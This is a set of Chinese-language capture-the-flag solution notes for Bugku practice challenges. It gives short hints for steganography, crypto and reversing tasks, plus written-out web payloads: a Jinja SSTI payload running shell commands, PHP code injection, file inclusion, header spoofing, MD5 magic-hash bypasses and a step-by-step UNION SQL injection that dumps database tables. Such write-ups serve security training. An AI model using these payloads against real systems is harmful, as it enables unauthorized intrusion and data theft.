1.Bugku刷题
Simple_SSTI_2
payload:?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%20%27cat%20../app/flag%27).read()%20}}
Flask_FileUpload
import os
os.system("cat /flag")
1和0的故事
二进制矩阵可以组成一个二维码,扫码即可。
easy_nbt
nbt是我的世界的文件格式,下载nbtexplorer打开文件夹搜flag即可。
抄错的字符
flag{Aman_very_cool}
这是一张单纯的图片
图片最后有一串编码,转换一下就出flag。注意是key{}形式。
隐写
使用TweakPNG将图片尺寸改为500*500。
telnet
文件后缀名改为txt直接搜flag。
或是用wireshark打开文件,筛选出telnet包,跟踪tcp流,第一个就是。
眼见非实
解压,把后缀名改为.zip,继续解压,然后打开document.xml,找flag。
啊哒
用binwalk分离文件,得到一个压缩包,在原图属性中,摄像机型号中有一串字符串,转码得到解压密码。
/.-
摩斯密码。
聪明的小羊
栅栏密码,解密即可。
ok
Ook解密即可。
[+-<>]
BrainFuck解码即可。
滑稽
查看源码。
计算器
F12,把输入框的宽度改一下,输入计算结果即可。
矛盾
1'
alert
源码里最后的字符进行html解码。
你必须让他停下
burp抓包,刷新页面,然后连续放两次包,F12查看即可。
game1
随便玩一下,抓包,然后把分数改高一点,sign后为对应的base64加密。
?score=50000&ip=27.18.178.103&sign=zMNTAwMDA===
网站被黑
目录爆破,找到shell.php,密码是hack。
本地管理员
源码注释里有个base64加密串,解密一下就是密码,账号为admin。burp抓包,X-Forwarded-For:127.0.0.1,即可。
bp
爆破密码,提示中给出为z开头的,后面跟五个字符,筛选一下即可。
eval
?hello=show_source(%27flag.php%27)
变量1
?args=globals//php全局变量的使用
头等舱
flag在响应头中。
社工-伪造
输入框内输入“我是你男朋友”。
哈哈哈哈
source
dirsearch扫描发现.git泄露,用githack下载,没有真flag。用wget -r url 命令下载,到.git文件夹中找flag。git reflog查看日志,然后使用git show 文件名 命令一个一个找。
源代码
源码中的三段unicode编码拼接起来转码一下。
文件包含
?file=/flag
好像需要密码
五位数字密码直接爆破即可。
入门逆向
ida打开exe文件就是flag。
Easy_Re
notepad++打开文件直接搜DUTCTF
把猪困在猪圈里
base64转图片,猪圈密码解密。
你喜欢下棋吗
棋盘密码解密得到解压密码,博多密码解密得到flag。
备份是个好习惯
双写key绕过替换函数,传入md5值相同的绕过if判断。
?kkeyey1=QNKCDZO&kkeyey2=240610708
cookies
filename为base64加密后的文件名。访问index.php得到源码,注意前边的line参数。写个py脚本爆出代码来,然后构造payload。
?line=&filename=a2V5cy5waHA=
Cookie: margin=margin
成绩查询
法一:sqlmap。
法二:联合查询注入。
id=1'order by 4 %23//5
id=-1'union select 1,2,3,4 %23
id=-1'union select 1,2,3,database() %23
id=-1'union select 1,2,3,group_concat(distinct table_name) from information_schema.columns where table_schema='skctf' %23
id=-1'union select 1,2,3,group_concat(distinct column_name) from information_schema.columns where table_schema='skctf' %23
id=-1'union select 1,2,3,skctf_flag from fl4g %23
你从哪里来
Referer:www.google.com